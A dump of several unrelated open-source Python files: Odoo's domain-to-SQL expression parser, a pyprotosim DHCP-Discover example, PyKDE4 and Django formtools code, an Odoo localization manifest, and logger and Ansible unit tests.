# Leafs management
# ----------------------------------------
def get_tables(self):
""" Returns the list of tables for SQL queries, like select from ... """
tables = []
for leaf in self.result:
for table in leaf.get_tables():
if table not in tables:
tables.append(table)
table_name = _quote(self.root_model._table)
if table_name not in tables:
tables.append(table_name)
return tables
# ----------------------------------------
# Parsing
# ----------------------------------------
def parse(self, cr, uid, context):
""" Transform the leaves of the expression
The principle is to pop elements from a leaf stack one at a time.
Each leaf is processed. The processing is an if/elif list of various
cases that appear in the leafs (many2one, function fields, ...).
Two things can happen as a processing result:
- the leaf has been modified and/or new leafs have to be introduced
in the expression; they are pushed into the leaf stack, to be
processed right after
- the leaf is added to the result
Some internal var explanation:
:var list path: left operand seen as a sequence of field names
("foo.bar" -> ["foo", "bar"])
:var obj model: model object, model containing the field
(the name provided in the left operand)
:var obj field: the field corresponding to `path[0]`
:var obj column: the column corresponding to `path[0]`
:var obj comodel: relational model of field (field.comodel)
(res_partner.bank_ids -> res.partner.bank)
"""
def to_ids(value, comodel, context=None, limit=None):
""" Normalize a single id or name, or a list of those, into a list of ids
:param {int,long,basestring,list,tuple} value:
if int, long -> return [value]
if basestring, convert it into a list of basestrings, then
if list of basestring ->
perform a name_search on comodel for each name
return the list of related ids
"""
names = []
if isinstance(value, basestring):
names = [value]
elif value and isinstance(value, (tuple, list)) and all(isinstance(item, basestring) for item in value):
names = value
elif isinstance(value, (int, long)):
return [value]
if names:
name_get_list = [name_get[0] for name in names for name_get in comodel.name_search(cr, uid, name, [], 'ilike', context=context, limit=limit)]
return list(set(name_get_list))
return list(value)
def child_of_domain(left, ids, left_model, parent=None, prefix='', context=None):
""" Return a domain implementing the child_of operator for [(left,child_of,ids)],
either as a range using the parent_left/right tree lookup fields
(when available), or as an expanded [(left,in,child_ids)] """
if left_model._parent_store and (not left_model.pool._init):
# TODO: Improve where joins are implemented for many with '.', replace by:
# doms += ['&',(prefix+'.parent_left','<',o.parent_right),(prefix+'.parent_left','>=',o.parent_left)]
doms = []
for o in left_model.browse(cr, uid, ids, context=context):
if doms:
doms.insert(0, OR_OPERATOR)
doms += [AND_OPERATOR, ('parent_left', '<', o.parent_right), ('parent_left', '>=', o.parent_left)]
if prefix:
return [(left, 'in', left_model.search(cr, uid, doms, context=context))]
return doms
else:
def recursive_children(ids, model, parent_field):
if not ids:
return []
ids2 = model.search(cr, uid, [(parent_field, 'in', ids)], context=context)
return ids + recursive_children(ids2, model, parent_field)
return [(left, 'in', recursive_children(ids, left_model, parent or left_model._parent_name))]
def pop():
""" Pop a leaf to process. """
return self.stack.pop()
def push(leaf):
""" Push a leaf to be processed right after. """
self.stack.append(leaf)
def push_result(leaf):
""" Push a leaf to the results. This leaf has been fully processed
and validated. """
self.result.append(leaf)
self.result = []
self.stack = [ExtendedLeaf(leaf, self.root_model) for leaf in self.expression]
# process from right to left; expression is from left to right
self.stack.reverse()
while self.stack:
# Get the next leaf to process
leaf = pop()
# Get working variables
if leaf.is_operator():
left, operator, right = leaf.leaf, None, None
elif leaf.is_true_leaf() or leaf.is_false_leaf():
# because we consider left as a string
left, operator, right = ('%s' % leaf.leaf[0], leaf.leaf[1], leaf.leaf[2])
else:
left, operator, right = leaf.leaf
path = left.split('.', 1)
model = leaf.model
field = model._fields.get(path[0])
column = model._columns.get(path[0])
comodel = model.pool.get(getattr(field, 'comodel_name', None))
# ----------------------------------------
# SIMPLE CASE
# 1. leaf is an operator
# 2. leaf is a true/false leaf
# -> add directly to result
# ----------------------------------------
if leaf.is_operator() or leaf.is_true_leaf() or leaf.is_false_leaf():
push_result(leaf)
# ----------------------------------------
# FIELD NOT FOUND
# -> from inherits'd fields -> work on the related model, and add
# a join condition
# -> ('id', 'child_of', '..') -> use a 'to_ids'
# -> if it is one of the _log_access special fields, add it directly
# to the result
# TODO: make these fields explicitly available in self.columns instead!
# -> else: crash
# ----------------------------------------
elif not column and path[0] in model._inherit_fields:
# comments about inherits'd fields
# { 'field_name': ('parent_model', 'm2o_field_to_reach_parent',
# field_column_obj, original_parent_model), ... }
next_model = model.pool[model._inherit_fields[path[0]][0]]
leaf.add_join_context(next_model, model._inherits[next_model._name], 'id', model._inherits[next_model._name])
push(leaf)
elif left == 'id' and operator == 'child_of':
ids2 = to_ids(right, model, context)
dom = child_of_domain(left, ids2, model)
for dom_leaf in reversed(dom):
new_leaf = create_substitution_leaf(leaf, dom_leaf, model)
push(new_leaf)
elif not column and path[0] in MAGIC_COLUMNS:
push_result(leaf)
elif not field:
raise ValueError("Invalid field %r in leaf %r" % (left, str(leaf)))
# ----------------------------------------
# PATH SPOTTED
# -> many2one or one2many with _auto_join:
# - add a join, then jump into linked column: column.remaining on
# src_table is replaced by remaining on dst_table, and set for re-evaluation
# - if a domain is defined on the column, add it into evaluation
# on the relational table
# -> many2one, many2many, one2many: replace by an equivalent computed
# domain, given by recursively searching on the remaining of the path
# -> note: hack about columns.property should not be necessary anymore
# as after transforming the column, it will go through this loop once again
# ----------------------------------------
elif len(path) > 1 and column._type == 'many2one' and column._auto_join:
# res_partner.state_id = res_partner__state_id.id
leaf.add_join_context(comodel, path[0], 'id', path[0])
push(create_substitution_leaf(leaf, (path[1], operator, right), comodel))
elif len(path) > 1 and column._type == 'one2many' and column._auto_join:
# res_partner.id = res_partner__bank_ids.partner_id
leaf.add_join_context(comodel, 'id', column._fields_id, path[0])
domain = column._domain(model) if callable(column._domain) else column._domain
push(create_substitution_leaf(leaf, (path[1], operator, right), comodel))
if domain:
domain = normalize_domain(domain)
for elem in reversed(domain):
push(create_substitution_leaf(leaf, elem, comodel))
push(create_substitution_leaf(leaf, AND_OPERATOR, comodel))
elif len(path) > 1 and column._auto_join:
raise NotImplementedError('_auto_join attribute not supported on many2many column %s' % left)
elif len(path) > 1 and column._type == 'many2one':
right_ids = comodel.search(cr, uid, [(path[1], operator, right)], context=context)
leaf.leaf = (path[0], 'in', right_ids)
push(leaf)
# Making search easier when there is a left operand as column.o2m or column.m2m
elif len(path) > 1 and column._type in ['many2many', 'one2many']:
right_ids = comodel.search(cr, uid, [(path[1], operator, right)], context=context)
table_ids = model.search(cr, uid, [(path[0], 'in', right_ids)], context=dict(context, active_test=False))
leaf.leaf = ('id', 'in', table_ids)
push(leaf)
elif not column:
# Non-stored field should provide an implementation of search.
if not field.search:
# field does not support search!
_logger.error("Non-stored field %s cannot be searched.", field)
if _logger.isEnabledFor(logging.DEBUG):
_logger.debug(''.join(traceback.format_stack()))
# Ignore it: generate a dummy leaf.
domain = []
else:
# Let the field generate a domain.
recs = model.browse(cr, uid, [], context)
domain = field.determine_domain(recs, operator, right)
if not domain:
leaf.leaf = TRUE_LEAF
push(leaf)
else:
for elem in reversed(domain):
push(create_substitution_leaf(leaf, elem, model))
# -------------------------------------------------
# FUNCTION FIELD
# -> not stored: error if no _fnct_search, otherwise handle the result domain
# -> stored: management done in the remaining of parsing
# -------------------------------------------------
elif isinstance(column, fields.function) and not column.store:
# this is a function field that is not stored
if not column._fnct_search:
_logger.error(
"Field '%s' (%s) can not be searched: "
"non-stored function field without fnct_search",
column.string, left)
# avoid compiling stack trace if not needed
if _logger.isEnabledFor(logging.DEBUG):
_logger.debug(''.join(traceback.format_stack()))
# ignore it: generate a dummy leaf
fct_domain = []
else:
fct_domain = column.search(cr, uid, model, left, [leaf.leaf], context=context)
if not fct_domain:
leaf.leaf = TRUE_LEAF
push(leaf)
else:
# we assume that the expression is valid
# we create a dummy leaf for forcing the parsing of the resulting expression
for domain_element in reversed(fct_domain):
push(create_substitution_leaf(leaf, domain_element, model))
# self.push(create_substitution_leaf(leaf, TRUE_LEAF, model))
# self.push(create_substitution_leaf(leaf, AND_OPERATOR, model))
# -------------------------------------------------
# RELATIONAL FIELDS
# -------------------------------------------------
# Applying recursivity on field(one2many)
elif column._type == 'one2many' and operator == 'child_of':
ids2 = to_ids(right, comodel, context)
if column._obj != model._name:
dom = child_of_domain(left, ids2, comodel, prefix=column._obj)
else:
dom = child_of_domain('id', ids2, model, parent=left)
for dom_leaf in reversed(dom):
push(create_substitution_leaf(leaf, dom_leaf, model))
elif column._type == 'one2many':
call_null = True
if right is not False:
if isinstance(right, basestring):
ids2 = [x[0] for x in comodel.name_search(cr, uid, right, [], operator, context=context, limit=None)]
if ids2:
operator = 'in'
elif isinstance(right, collections.Iterable):
ids2 = right
else:
ids2 = [right]
if not ids2:
if operator in ['like', 'ilike', 'in', '=']:
#no result found with given search criteria
call_null = False
push(create_substitution_leaf(leaf, FALSE_LEAF, model))
else:
ids2 = select_from_where(cr, column._fields_id, comodel._table, 'id', ids2, operator)
if ids2:
call_null = False
o2m_op = 'not in' if operator in NEGATIVE_TERM_OPERATORS else 'in'
push(create_substitution_leaf(leaf, ('id', o2m_op, ids2), model))
if call_null:
o2m_op = 'in' if operator in NEGATIVE_TERM_OPERATORS else 'not in'
push(create_substitution_leaf(leaf, ('id', o2m_op, select_distinct_from_where_not_null(cr, column._fields_id, comodel._table)), model))
elif column._type == 'many2many':
rel_table, rel_id1, rel_id2 = column._sql_names(model)
#FIXME
if operator == 'child_of':
def _rec_convert(ids):
if comodel == model:
return ids
return select_from_where(cr, rel_id1, rel_table, rel_id2, ids, operator)
ids2 = to_ids(right, comodel, context)
dom = child_of_domain('id', ids2, comodel)
ids2 = comodel.search(cr, uid, dom, context=context)
push(create_substitution_leaf(leaf, ('id', 'in', _rec_convert(ids2)), model))
else:
call_null_m2m = True
if right is not False:
if isinstance(right, basestring):
res_ids = [x[0] for x in comodel.name_search(cr, uid, right, [], operator, context=context)]
if res_ids:
operator = 'in'
else:
if not isinstance(right, list):
res_ids = [right]
else:
res_ids = right
if not res_ids:
if operator in ['like', 'ilike', 'in', '=']:
#no result found with given search criteria
call_null_m2m = False
push(create_substitution_leaf(leaf, FALSE_LEAF, model))
else:
operator = 'in' # operator changed because ids are directly related to main object
else:
call_null_m2m = False
m2m_op = 'not in' if operator in NEGATIVE_TERM_OPERATORS else 'in'
push(create_substitution_leaf(leaf, ('id', m2m_op, select_from_where(cr, rel_id1, rel_table, rel_id2, res_ids, operator) or [0]), model))
if call_null_m2m:
m2m_op = 'in' if operator in NEGATIVE_TERM_OPERATORS else 'not in'
push(create_substitution_leaf(leaf, ('id', m2m_op, select_distinct_from_where_not_null(cr, rel_id1, rel_table)), model))
elif column._type == 'many2one':
if operator == 'child_of':
ids2 = to_ids(right, comodel, context)
if column._obj != model._name:
dom = child_of_domain(left, ids2, comodel, prefix=column._obj)
else:
dom = child_of_domain('id', ids2, model, parent=left)
for dom_leaf in reversed(dom):
push(create_substitution_leaf(leaf, dom_leaf, model))
else:
def _get_expression(comodel, cr, uid, left, right, operator, context=None):
if context is None:
context = {}
c = context.copy()
c['active_test'] = False
# Special treatment for ill-formed domains
operator = (operator in ['<', '>', '<=', '>=']) and 'in' or operator
dict_op = {'not in': '!=', 'in': '=', '=': 'in', '!=': 'not in'}
if isinstance(right, tuple):
right = list(right)
if (not isinstance(right, list)) and operator in ['not in', 'in']:
operator = dict_op[operator]
elif isinstance(right, list) and operator in ['!=', '=']: # for domain (FIELD,'=',['value1','value2'])
operator = dict_op[operator]
res_ids = [x[0] for x in comodel.name_search(cr, uid, right, [], operator, limit=None, context=c)]
if operator in NEGATIVE_TERM_OPERATORS:
res_ids.append(False) # TODO this should not be appended if False was in 'right'
return left, 'in', res_ids
# resolve string-based m2o criterion into IDs
if isinstance(right, basestring) or \
right and isinstance(right, (tuple, list)) and all(isinstance(item, basestring) for item in right):
push(create_substitution_leaf(leaf, _get_expression(comodel, cr, uid, left, right, operator, context=context), model))
else:
# right == [] or right == False and all other cases are handled by __leaf_to_sql()
push_result(leaf)
# -------------------------------------------------
# OTHER FIELDS
# -> datetime fields: manage time part of the datetime
# column when it is not there
# -> manage translatable fields
# -------------------------------------------------
else:
if column._type == 'datetime' and right and len(right) == 10:
if operator in ('>', '<='):
right += ' 23:59:59'
else:
right += ' 00:00:00'
push(create_substitution_leaf(leaf, (left, operator, right), model))
elif column.translate and right:
need_wildcard = operator in ('like', 'ilike', 'not like', 'not ilike')
sql_operator = {'=like': 'like', '=ilike': 'ilike'}.get(operator, operator)
if need_wildcard:
right = '%%%s%%' % right
inselect_operator = 'inselect'
if sql_operator in NEGATIVE_TERM_OPERATORS:
# negate operator (fix lp:1071710)
sql_operator = sql_operator[4:] if sql_operator[:3] == 'not' else '='
inselect_operator = 'not inselect'
unaccent = self._unaccent if sql_operator.endswith('like') else lambda x: x
instr = unaccent('%s')
if sql_operator == 'in':
# params will be flattened by to_sql() => expand the placeholders
instr = '(%s)' % ', '.join(['%s'] * len(right))
subselect = """WITH temp_irt_current (id, name) as (
SELECT ct.id, coalesce(it.value,ct.{quote_left})
FROM {current_table} ct
LEFT JOIN ir_translation it ON (it.name = %s and
it.lang = %s and
it.type = %s and
it.res_id = ct.id and
it.value != '')
)
SELECT id FROM temp_irt_current WHERE {name} {operator} {right} order by name
""".format(current_table=model._table, quote_left=_quote(left), name=unaccent('name'),
operator=sql_operator, right=instr)
params = (
model._name + ',' + left,
context.get('lang') or 'en_US',
'model',
right,
)
push(create_substitution_leaf(leaf, ('id', inselect_operator, (subselect, params)), model))
else:
push_result(leaf)
# ----------------------------------------
# END OF PARSING FULL DOMAIN
# -> generate joins
# ----------------------------------------
joins = set()
for leaf in self.result:
joins |= set(leaf.get_join_conditions())
self.joins = list(joins)
def __leaf_to_sql(self, eleaf):
model = eleaf.model
leaf = eleaf.leaf
left, operator, right = leaf
# final sanity checks - should never fail
assert operator in (TERM_OPERATORS + ('inselect', 'not inselect')), \
"Invalid operator %r in domain term %r" % (operator, leaf)
assert leaf in (TRUE_LEAF, FALSE_LEAF) or left in model._fields \
or left in MAGIC_COLUMNS, "Invalid field %r in domain term %r" % (left, leaf)
assert not isinstance(right, BaseModel), \
"Invalid value %r in domain term %r" % (right, leaf)
table_alias = '"%s"' % (eleaf.generate_alias())
if leaf == TRUE_LEAF:
query = 'TRUE'
params = []
elif leaf == FALSE_LEAF:
query = 'FALSE'
params = []
elif operator == 'inselect':
query = '(%s."%s" in (%s))' % (table_alias, left, right[0])
params = right[1]
elif operator == 'not inselect':
query = '(%s."%s" not in (%s))' % (table_alias, left, right[0])
params = right[1]
elif operator in ['in', 'not in']:
# Two cases: right is a boolean or a list. The boolean case is an
# abuse and handled for backward compatibility.
if isinstance(right, bool):
_logger.warning("The domain term '%s' should use the '=' or '!=' operator." % (leaf,))
if operator == 'in':
r = 'NOT NULL' if right else 'NULL'
else:
r = 'NULL' if right else 'NOT NULL'
query = '(%s."%s" IS %s)' % (table_alias, left, r)
params = []
elif isinstance(right, (list, tuple)):
params = list(right)
check_nulls = False
for i in range(len(params))[::-1]:
if params[i] == False:
check_nulls = True
del params[i]
if params:
if left == 'id':
instr = ','.join(['%s'] * len(params))
else:
ss = model._columns[left]._symbol_set
instr = ','.join([ss[0]] * len(params))
params = map(ss[1], params)
query = '(%s."%s" %s (%s))' % (table_alias, left, operator, instr)
else:
# The case for (left, 'in', []) or (left, 'not in', []).
query = 'FALSE' if operator == 'in' else 'TRUE'
if check_nulls and operator == 'in':
query = '(%s OR %s."%s" IS NULL)' % (query, table_alias, left)
elif not check_nulls and operator == 'not in':
query = '(%s OR %s."%s" IS NULL)' % (query, table_alias, left)
elif check_nulls and operator == 'not in':
query = '(%s AND %s."%s" IS NOT NULL)' % (query, table_alias, left) # needed only for TRUE.
else: # Must not happen
raise ValueError("Invalid domain term %r" % (leaf,))
elif right == False and (left in model._columns) and model._columns[left]._type == "boolean" and (operator == '='):
query = '(%s."%s" IS NULL or %s."%s" = false )' % (table_alias, left, table_alias, left)
params = []
elif (right is False or right is None) and (operator == '='):
query = '%s."%s" IS NULL ' % (table_alias, left)
params = []
elif right == False and (left in model._columns) and model._columns[left]._type == "boolean" and (operator == '!='):
query = '(%s."%s" IS NOT NULL and %s."%s" != false)' % (table_alias, left, table_alias, left)
params = []
elif (right is False or right is None) and (operator == '!='):
query = '%s."%s" IS NOT NULL' % (table_alias, left)
params = []
elif operator == '=?':
if right is False or right is None:
# '=?' is a short-circuit that makes the term TRUE if right is None or False
query = 'TRUE'
params = []
else:
# '=?' behaves like '=' in other cases
query, params = self.__leaf_to_sql(
create_substitution_leaf(eleaf, (left, '=', right), model))
elif left == 'id':
query = '%s.id %s %%s' % (table_alias, operator)
params = right
else:
need_wildcard = operator in ('like', 'ilike', 'not like', 'not ilike')
sql_operator = {'=like': 'like', '=ilike': 'ilike'}.get(operator, operator)
cast = '::text' if sql_operator.endswith('like') else ''
if left in model._columns:
format = need_wildcard and '%s' or model._columns[left]._symbol_set[0]
unaccent = self._unaccent if sql_operator.endswith('like') else lambda x: x
column = '%s.%s' % (table_alias, _quote(left))
query = '(%s %s %s)' % (unaccent(column + cast), sql_operator, unaccent(format))
elif left in MAGIC_COLUMNS:
query = "(%s.\"%s\"%s %s %%s)" % (table_alias, left, cast, sql_operator)
params = right
else: # Must not happen
raise ValueError("Invalid field %r in domain term %r" % (left, leaf))
add_null = False
if need_wildcard:
if isinstance(right, str):
str_utf8 = right
elif isinstance(right, unicode):
str_utf8 = right.encode('utf-8')
else:
str_utf8 = str(right)
params = '%%%s%%' % str_utf8
add_null = not str_utf8
elif left in model._columns:
params = model._columns[left]._symbol_set[1](right)
if add_null:
query = '(%s OR %s."%s" IS NULL)' % (query, table_alias, left)
if isinstance(params, basestring):
params = [params]
return query, params
def to_sql(self):
stack = []
params = []
# Process the domain from right to left, using a stack, to generate a SQL expression.
self.result.reverse()
for leaf in self.result:
if leaf.is_leaf(internal=True):
q, p = self.__leaf_to_sql(leaf)
params.insert(0, p)
stack.append(q)
elif leaf.leaf == NOT_OPERATOR:
stack.append('(NOT (%s))' % (stack.pop(),))
else:
ops = {AND_OPERATOR: ' AND ', OR_OPERATOR: ' OR '}
q1 = stack.pop()
q2 = stack.pop()
stack.append('(%s %s %s)' % (q1, ops[leaf.leaf], q2,))
assert len(stack) == 1
query = stack[0]
joins = ' AND '.join(self.joins)
if joins:
query = '(%s) AND %s' % (joins, query)
return query, tools.flatten(params)
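# A hedged end-to-end sketch (cr/uid and partner_model are placeholders; the
# exact SQL depends on the model's columns):
# >>> e = expression(cr, uid, [('name', '=', 'OpenERP')], partner_model, {})
# >>> e.to_sql()
# ('("res_partner"."name" = %s)', ['OpenERP'])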
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
marcosbontempo/algar
|
refs/heads/master
|
pyprotosim-0.3.2/pyprotosim/example/dhcp_OK.py
|
3
|
#!/usr/bin/env python
##################################################################
# Copyright (c) 2012, Sergej Srepfler <sergej.srepfler@gmail.com>
# February 2012 - September 2012
# Version 0.2.8, Last change on Sep 25, 2012
# This software is distributed under the terms of BSD license.
##################################################################
import sys
import socket
import IN
if __name__ == "__main__":
LOCAL_PORT=68
SERVER_PORT=67
LOCAL_IP="0.0.0.0"
BCAST_IP="255.255.255.255"
LISTEN_DEV="eth3"
MSG_SIZE=2048
###########################################################
Conn=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# socket is in blocking mode, so let's add a timeout
Conn.settimeout(3)
# Bind to Device
Conn.setsockopt(socket.SOL_SOCKET,IN.SO_BINDTODEVICE,LISTEN_DEV+'\0')
# Enable ReuseAddr & Broadcast
Conn.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
Conn.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST,1)
# Bind to Address
Conn.bind(('', LOCAL_PORT))
##########################################################
# Create DHCP-Discovery
MAC="E83935BDAB2A"
msg="0101060029104a2e0004800000000000000000000000000000000000"+MAC+"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063825363350101371801020305060b0c0d0f1011122b363c438081828384858687390204ec611100000000003030323132383130344132455d0200005e030102013c20505845436c69656e743a417263683a30303030303a554e44493a303032303031ff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
# send data
Conn.sendto(msg.decode("hex"),(BCAST_IP,SERVER_PORT))
Conn.close()
# Receive response
rConn=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
rConn.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
rConn.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
#rConn.setsockopt(socket.SOL_SOCKET,IN.SO_BINDTODEVICE,LISTEN_DEV+'\0')
rConn.bind(('',LOCAL_PORT))
while True:
msg,addr = rConn.recvfrom(MSG_SIZE)
print "Answer from "+addr[0]
#received = rConn.recvfrom(MSG_SIZE)
# Process response
# Normally - this is the end.
###########################################################
# And close the receiving connection (Conn was already closed above)
rConn.close()
######################################################
# History
# 0.2.8 - May 31, 2017 - DHCP initial version
|
gmariotti/lassim
|
refs/heads/master
|
test/utilities/test_logger_setup.py
|
1
|
import logging
import os
from unittest import TestCase
from utilities.logger_setup import LoggerSetup
__author__ = "Guido Pio Mariotti"
__copyright__ = "Copyright (C) 2016 Guido Pio Mariotti"
__license__ = "GNU General Public License v3.0"
__version__ = "0.1.0"
class TestMySetup(TestCase):
def setUp(self):
self.logfile = "test.log"
if os.path.isfile(self.logfile):
os.remove(self.logfile)
def tearDown(self):
if os.path.isfile(self.logfile):
os.remove(self.logfile)
def test_LoggerWithFileLog(self):
setup = LoggerSetup()
setup.set_file_log(level=logging.INFO, logfile=self.logfile)
log_message = "log test"
logger = logging.getLogger(__name__)
logger.info(log_message)
expected = [log_message, "INFO"]
with open(self.logfile) as logfile:
# first two lines contain the change in level of the logger
line = logfile.readline()
line = logfile.readline()
line = logfile.readline()
for message in expected:
self.assertIn(message, line,
"{} not found in line {}".format(message, line))
|
KDE/pykde4
|
refs/heads/master
|
examples/kdeuiExamples/kdatepicker.py
|
1
|
from PyQt4.QtCore import SIGNAL, Qt
from PyQt4.QtGui import QLabel
from PyKDE4.kdecore import i18n
from PyKDE4.kdeui import KVBox, KHBox, KDatePicker, KDateWidget
helpText = """Date selection widgets - KDatePicker and KDateWidget - provide widgets for calendar
date input.
KDatePicker emits two types of signals, either dateSelected() or dateEntered().
A line edit allows the user to select a date directly by entering numbers like
19990101 or 990101 into KDatePicker."""
class MainFrame(KVBox):
def __init__(self, parent=None):
KVBox.__init__(self, parent)
self.help = QLabel (i18n (helpText), self)
self.layout ().setAlignment (self.help, Qt.AlignHCenter | Qt.AlignTop)
self.setSpacing (40)
hBox = KHBox (self)
vBox1 = KVBox (hBox)
vBox2 = KVBox (hBox)
hBox.layout ().setAlignment (vBox1, Qt.AlignHCenter)
hBox.layout ().setAlignment (vBox2, Qt.AlignHCenter)
vBox1.setMargin (20)
vBox2.setSpacing (20)
self.datePickerLabel = QLabel ("KDatePicker", vBox1)
self.datePicker = KDatePicker(vBox2)
self.datePicker.setFixedSize (400, 200)
self.other = QLabel('KDateWidget', vBox1)
vBox1.layout ().setAlignment (self.other, Qt.AlignBottom)
self.dateDisplay = KDateWidget(vBox2)
self.connect(self.datePicker, SIGNAL('dateChanged(QDate)'),
self.dateDisplay.setDate)
# This example can be run standalone
if __name__ == '__main__':
import sys
from PyKDE4.kdecore import KCmdLineArgs, KAboutData, KLocalizedString, ki18n
from PyKDE4.kdeui import KApplication, KMainWindow
class MainWin (KMainWindow):
def __init__ (self, *args):
KMainWindow.__init__ (self)
self.resize(640, 500)
self.setCentralWidget (MainFrame (self))
#-------------------- main ------------------------------------------------
appName = "kdatepicker"
catalog = ""
programName = ki18n ("kdatepicker")
version = "1.0"
description = ki18n ("KDatePicker Example")
license = KAboutData.License_GPL
copyright = ki18n ("(c) 2006 Troy Melhase")
text = ki18n ("none")
homePage = "www.riverbankcomputing.com"
bugEmail = "jbublitz@nwinternet.com"
aboutData = KAboutData (appName, catalog, programName, version, description,
license, copyright, text, homePage, bugEmail)
aboutData.addAuthor (ki18n ("Troy Melhase"), ki18n ("original concept"))
aboutData.addAuthor (ki18n ("Jim Bublitz"), ki18n ("pykdedocs"))
KCmdLineArgs.init (sys.argv, aboutData)
app = KApplication ()
mainWindow = MainWin (None, "main window")
mainWindow.show()
app.connect (app, SIGNAL ("lastWindowClosed ()"), app.quit)
app.exec_ ()
|
boooka/GeoPowerOff
|
refs/heads/master
|
venv/lib/python2.7/site-packages/django/contrib/formtools/wizard/storage/__init__.py
|
95
|
from django.utils.module_loading import import_string
from django.contrib.formtools.wizard.storage.base import BaseStorage
from django.contrib.formtools.wizard.storage.exceptions import (
MissingStorage, NoFileStorageConfigured)
__all__ = [
"BaseStorage", "MissingStorage", "NoFileStorageConfigured", "get_storage",
]
def get_storage(path, *args, **kwargs):
try:
storage_class = import_string(path)
except ImportError as e:
raise MissingStorage('Error loading storage: %s' % e)
return storage_class(*args, **kwargs)
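# A hedged usage sketch (the dotted path must point to a BaseStorage
# subclass; the prefix and request below are illustrative):
# storage = get_storage(
#     'django.contrib.formtools.wizard.storage.session.SessionStorage',
#     'wizard_demo', request)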
|
slevenhagen/odoo
|
refs/heads/8.0
|
addons/l10n_uy/__openerp__.py
|
260
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 2011 Openerp.uy <openerp.uy@lists.launchpad.net>
# OpenERP localization project for Uruguay
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Uruguay - Chart of Accounts',
'version': '0.1',
'author': 'Uruguay l10n Team & Guillem Barba',
'category': 'Localization/Account Charts',
'website': 'https://launchpad.net/openerp-uruguay',
'description': """
General Chart of Accounts.
==========================
Provides templates for the chart of accounts and taxes for Uruguay.
""",
'license': 'AGPL-3',
'depends': ['account'],
'data': [
'account_types.xml',
'taxes_code_template.xml',
'account_chart_template.xml',
'taxes_template.xml',
'l10n_uy_wizard.xml',
],
'demo': [],
'auto_install': False,
'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
Qalthos/ansible
|
refs/heads/devel
|
test/units/executor/test_task_result.py
|
113
|
# (c) 2016, James Cammarata <jimi@sngx.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat import unittest
from units.compat.mock import patch, MagicMock
from ansible.executor.task_result import TaskResult
class TestTaskResult(unittest.TestCase):
def test_task_result_basic(self):
mock_host = MagicMock()
mock_task = MagicMock()
# test loading a result with a dict
tr = TaskResult(mock_host, mock_task, dict())
# test loading a result with a JSON string
with patch('ansible.parsing.dataloader.DataLoader.load') as p:
tr = TaskResult(mock_host, mock_task, '{}')
def test_task_result_is_changed(self):
mock_host = MagicMock()
mock_task = MagicMock()
# test with no changed in result
tr = TaskResult(mock_host, mock_task, dict())
self.assertFalse(tr.is_changed())
# test with changed in the result
tr = TaskResult(mock_host, mock_task, dict(changed=True))
self.assertTrue(tr.is_changed())
# test with multiple results but none changed
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(foo='bar'), dict(bam='baz'), True]))
self.assertFalse(tr.is_changed())
# test with multiple results and one changed
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(changed=False), dict(changed=True), dict(some_key=False)]))
self.assertTrue(tr.is_changed())
def test_task_result_is_skipped(self):
mock_host = MagicMock()
mock_task = MagicMock()
# test with no skipped in result
tr = TaskResult(mock_host, mock_task, dict())
self.assertFalse(tr.is_skipped())
# test with skipped in the result
tr = TaskResult(mock_host, mock_task, dict(skipped=True))
self.assertTrue(tr.is_skipped())
# test with multiple results but none skipped
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(foo='bar'), dict(bam='baz'), True]))
self.assertFalse(tr.is_skipped())
# test with multiple results and one skipped
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(skipped=False), dict(skipped=True), dict(some_key=False)]))
self.assertFalse(tr.is_skipped())
# test with multiple results and all skipped
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=[dict(skipped=True), dict(skipped=True), dict(skipped=True)]))
self.assertTrue(tr.is_skipped())
# test with multiple squashed results (list of strings)
# first with the main result having skipped=False
mock_task.loop = 'foo'
tr = TaskResult(mock_host, mock_task, dict(results=["a", "b", "c"], skipped=False))
self.assertFalse(tr.is_skipped())
# then with the main result having skipped=True
tr = TaskResult(mock_host, mock_task, dict(results=["a", "b", "c"], skipped=True))
self.assertTrue(tr.is_skipped())
def test_task_result_is_unreachable(self):
mock_host = MagicMock()
mock_task = MagicMock()
